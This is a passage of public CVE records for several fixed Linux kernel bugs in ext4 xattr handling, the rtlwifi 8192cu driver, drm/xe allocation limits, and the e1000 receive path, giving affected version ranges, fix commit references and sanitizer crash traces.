"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.237",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.13.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.14.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:25.087Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b72a3476f0c97d02f63a6e9fff127348d55436f6"
},
{
"url": "https://git.kernel.org/stable/c/3d8d22e75f7edfa0b30ff27330fd6a1285d594c3"
},
{
"url": "https://git.kernel.org/stable/c/190ad0f22ba49f1101182b80e3af50ca2ddfe72f"
},
{
"url": "https://git.kernel.org/stable/c/b5d942922182e82724b7152cb998f540132885ec"
},
{
"url": "https://git.kernel.org/stable/c/5b154e901fda2e98570b8f426a481f5740097dc2"
},
{
"url": "https://git.kernel.org/stable/c/ce5f54c065a4a7cbb92787f4f140917112350142"
},
{
"url": "https://git.kernel.org/stable/c/b97cb7d6a051aa6ebd57906df0e26e9e36c26d14"
}
],
"title": "ext4: xattr: fix null pointer deref in ext4_raw_inode()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68820",
"datePublished": "2026-01-13T15:29:23.351Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:25.087Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71100 (GCVE-0-2025-71100)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()
TID getting from ieee80211_get_tid() might be out of range of array size
of sta_entry->tids[], so check TID is less than MAX_TID_COUNT. Otherwise,
UBSAN warn:
UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30
index 10 is out of range for type 'rtl_tid_data [9]'
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 8ca4cdef93297c9b9bf08da39bc940bd20acbb94, < 9765d6eb8298b07d499cdf9ef7c237d3540102d6 (git) |
| Linux | Linux | Affected: 8ca4cdef93297c9b9bf08da39bc940bd20acbb94, < 90a15ff324645aa806d81fa349497cd964861b66 (git) |
| Linux | Linux | Affected: 8ca4cdef93297c9b9bf08da39bc940bd20acbb94, < dd39edb445f07400e748da967a07d5dca5c5f96e (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9765d6eb8298b07d499cdf9ef7c237d3540102d6",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
},
{
"lessThan": "90a15ff324645aa806d81fa349497cd964861b66",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
},
{
"lessThan": "dd39edb445f07400e748da967a07d5dca5c5f96e",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:59.039Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9765d6eb8298b07d499cdf9ef7c237d3540102d6"
},
{
"url": "https://git.kernel.org/stable/c/90a15ff324645aa806d81fa349497cd964861b66"
},
{
"url": "https://git.kernel.org/stable/c/dd39edb445f07400e748da967a07d5dca5c5f96e"
}
],
"title": "wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71100",
"datePublished": "2026-01-13T15:34:59.039Z",
"dateReserved": "2026-01-13T15:30:19.651Z",
"dateUpdated": "2026-01-13T15:34:59.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68802 (GCVE-0-2025-68802)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
drm/xe: Limit num_syncs to prevent oversized allocations
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Limit num_syncs to prevent oversized allocations
The exec and vm_bind ioctl allow userspace to specify an arbitrary
num_syncs value. Without bounds checking, a very large num_syncs
can force an excessively large allocation, leading to kernel warnings
from the page allocator as below.
Introduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request
exceeding this limit.
"
------------[ cut here ]------------
WARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124
...
Call Trace:
<TASK>
alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416
___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317
__kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348
__do_kmalloc_node mm/slub.c:4364 [inline]
__kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388
kmalloc_noprof include/linux/slab.h:909 [inline]
kmalloc_array_noprof include/linux/slab.h:948 [inline]
xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158
drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797
drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894
xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:598 [inline]
__se_sys_ioctl fs/ioctl.c:584 [inline]
__x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
...
"
v2: Add "Reported-by" and Cc stable kernels.
v3: Change XE_MAX_SYNCS from 64 to 1024. (Matt & Ashutosh)
v4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)
v5: Do the check at the top of the exec func. (Matt)
(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: dd08ebf6c3525a7ea2186e636df064ea47281987, < e281d1fd6903a081ef023c341145ae92258e38d2 (git) |
| Linux | Linux | Affected: dd08ebf6c3525a7ea2186e636df064ea47281987, < 1d200017f55f829b9e376093bd31dfbec92081de (git) |
| Linux | Linux | Affected: dd08ebf6c3525a7ea2186e636df064ea47281987, < 8e461304009135270e9ccf2d7e2dfe29daec9b60 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_exec.c",
"drivers/gpu/drm/xe/xe_vm.c",
"include/uapi/drm/xe_drm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e281d1fd6903a081ef023c341145ae92258e38d2",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
},
{
"lessThan": "1d200017f55f829b9e376093bd31dfbec92081de",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
},
{
"lessThan": "8e461304009135270e9ccf2d7e2dfe29daec9b60",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_exec.c",
"drivers/gpu/drm/xe/xe_vm.c",
"include/uapi/drm/xe_drm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:11.079Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e281d1fd6903a081ef023c341145ae92258e38d2"
},
{
"url": "https://git.kernel.org/stable/c/1d200017f55f829b9e376093bd31dfbec92081de"
},
{
"url": "https://git.kernel.org/stable/c/8e461304009135270e9ccf2d7e2dfe29daec9b60"
}
],
"title": "drm/xe: Limit num_syncs to prevent oversized allocations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68802",
"datePublished": "2026-01-13T15:29:11.079Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:11.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71093 (GCVE-0-2025-71093)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
e1000: fix OOB in e1000_tbi_should_accept()
Summary
In the Linux kernel, the following vulnerability has been resolved:
e1000: fix OOB in e1000_tbi_should_accept()
In e1000_tbi_should_accept() we read the last byte of the frame via
'data[length - 1]' to evaluate the TBI workaround. If the descriptor-
reported length is zero or larger than the actual RX buffer size, this
read goes out of bounds and can hit unrelated slab objects. The issue
is observed from the NAPI receive path (e1000_clean_rx_irq):
==================================================================
BUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790
Read of size 1 at addr ffff888014114e54 by task sshd/363
CPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
<IRQ>
dump_stack_lvl+0x5a/0x74
print_address_description+0x7b/0x440
print_report+0x101/0x200
kasan_report+0xc1/0xf0
e1000_tbi_should_accept+0x610/0x790
e1000_clean_rx_irq+0xa8c/0x1110
e1000_clean+0xde2/0x3c10
__napi_poll+0x98/0x380
net_rx_action+0x491/0xa20
__do_softirq+0x2c9/0x61d
do_softirq+0xd1/0x120
</IRQ>
<TASK>
__local_bh_enable_ip+0xfe/0x130
ip_finish_output2+0x7d5/0xb00
__ip_queue_xmit+0xe24/0x1ab0
__tcp_transmit_skb+0x1bcb/0x3340
tcp_write_xmit+0x175d/0x6bd0
__tcp_push_pending_frames+0x7b/0x280
tcp_sendmsg_locked+0x2e4f/0x32d0
tcp_sendmsg+0x24/0x40
sock_write_iter+0x322/0x430
vfs_write+0x56c/0xa60
ksys_write+0xd1/0x190
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f511b476b10
Code: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24
RSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10
RDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003
RBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00
R10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003
</TASK>
Allocated by task 1:
__kasan_krealloc+0x131/0x1c0
krealloc+0x90/0xc0
add_sysfs_param+0xcb/0x8a0
kernel_add_sysfs_param+0x81/0xd4
param_sysfs_builtin+0x138/0x1a6
param_sysfs_init+0x57/0x5b
do_one_initcall+0x104/0x250
do_initcall_level+0x102/0x132
do_initcalls+0x46/0x74
kernel_init_freeable+0x28f/0x393
kernel_init+0x14/0x1a0
ret_from_fork+0x22/0x30
The buggy address belongs to the object at ffff888014114000
which belongs to the cache kmalloc-2k of size 2048
The buggy address is located 1620 bytes to the right of
2048-byte region [ffff888014114000, ffff888014114800]
The buggy address belongs to the physical page:
page:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110
head:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0
flags: 0x100000000010200(slab|head|node=0|zone=1)
raw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000
raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
==================================================================
This happens because the TBI check unconditionally dereferences the last
byte without validating the reported length first:
u8 last_byte = *(data + length - 1);
Fix by rejecting the frame early if the length is zero, or if it exceeds
adapter->rx_buffer_len. This preserves the TBI workaround semantics for
valid frames and prevents touching memory beyond the RX buffer.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < 4ccfa56f272241e8d8e2c38191fdbb03df489d80 (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < 278b7cfe0d4da7502c7fd679b15032f014c92892 (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < ad7a2a45e2417ac54089926b520924f8f0d91aea (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < 2c4c0c09f9648ba766d399917d420d03e7b3e1f8 (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < 26c8bebc2f25288c2bcac7bc0a7662279a0e817c (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < ee7c125fb3e8b04dd46510130b9fc92380e5d578 (git) |
| Linux | Linux | Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b, < 9c72a5182ed92904d01057f208c390a303f00a0f (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/e1000/e1000_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4ccfa56f272241e8d8e2c38191fdbb03df489d80",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "278b7cfe0d4da7502c7fd679b15032f014c92892",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "ad7a2a45e2417ac54089926b520924f8f0d91aea",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "2c4c0c09f9648ba766d399917d420d03e7b3e1f8",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "26c8bebc2f25288c2bcac7bc0a7662279a0e817c",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "ee7c125fb3e8b04dd46510130b9fc92380e5d578",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "9c72a5182ed92904d01057f208c390a303f00a0f",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/e1000/e1000_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 
